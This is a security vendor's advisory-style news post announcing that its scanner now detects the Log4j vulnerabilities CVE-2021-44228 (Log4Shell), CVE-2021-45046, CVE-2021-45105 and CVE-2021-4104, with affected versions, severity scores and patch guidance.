23.12.2021: DerScanner’s vulnerability database now includes zero-day threats from Log4Shell – DerScanner

CVE-2021-44228 (CVSS Threat Score: 10/10) — critical remote code execution vulnerability, which affects Log4j versions from 2.0-beta9 to 2.14.1. Partially fixed in patch 2.15.0.

The vulnerability allows a specific string to be stored in the logs of Java-based applications and servers that use the Log4j library. When an application or server processes the logs, the chain can force the vulnerable system to download and execute malicious code. As a result, the attacker can gain full control over the vulnerable application or server. After that, the attack can develop further.

Apache Software Foundation developers released an emergency security update — the issue was partially resolved in version 2.15.0. Version 2.15.0 does not take into account certain logging options allowing intruders to attack a vulnerable system.

Patch 2.15.0 fixes the vulnerability by disabling lookup JNDI messages. In non-default configurations, it can be used to create a malicious entry using the JNDI search pattern. This can lead to a denial of service attack and the execution of arbitrary code. This scenario has been assigned a separate CVE-2021-45046 identifier.

CVE-2021-44228 can be exploited if log4j2.formatMsgNoLookups is set to false. To prevent attacks, the Log4j 2.15.0 patch sets this parameter to true. When updating to 2.15.0, the parameter should not be set to false. Log4j library users who have not updated, but set the parameter to true, can block the attacks.

CVE-2021-45046 (CVSS Threat Score: 9/10) — critical vulnerability that can be exploited to conduct DoS attacks and remote code execution. The issue affects Log4j versions from 2.0-beta9 to 2.15.0 (2.12.2 is an exception).

In Log4j version 2.15.0, it was possible to exploit the CVE-2021-44228 vulnerability with specific custom configuration settings. Only one aspect of JNDI’s message search functionality was disabled there. In the 2.16 update, JNDI support was disabled by default and message search processing was completely removed.

CVE-2021-45105 (CVSS Threat Score: 7.5/10) — Dangerous DoS vulnerability in Java 8-based systems, which allows causing a denial of service and appears as a loop and crash when processing certain strings.

The vulnerability affects Log4j versions from 2.0-beta9 to 2.16.0. The aforementioned versions lacked protection against runaway recursion allowing an attacker to cause a loop by manipulating a value during substitution. The loop caused the stack to run out of space and the process crashed. The patch has been released for version 2.17.0.

CVE-2021-4104 (CVSS Threat Score: 8.1/10) — Insecure deserialization vulnerability affecting Log4j 1.2 versions. No patch, update to version 2.17.0 is required.

Maria H. Underwood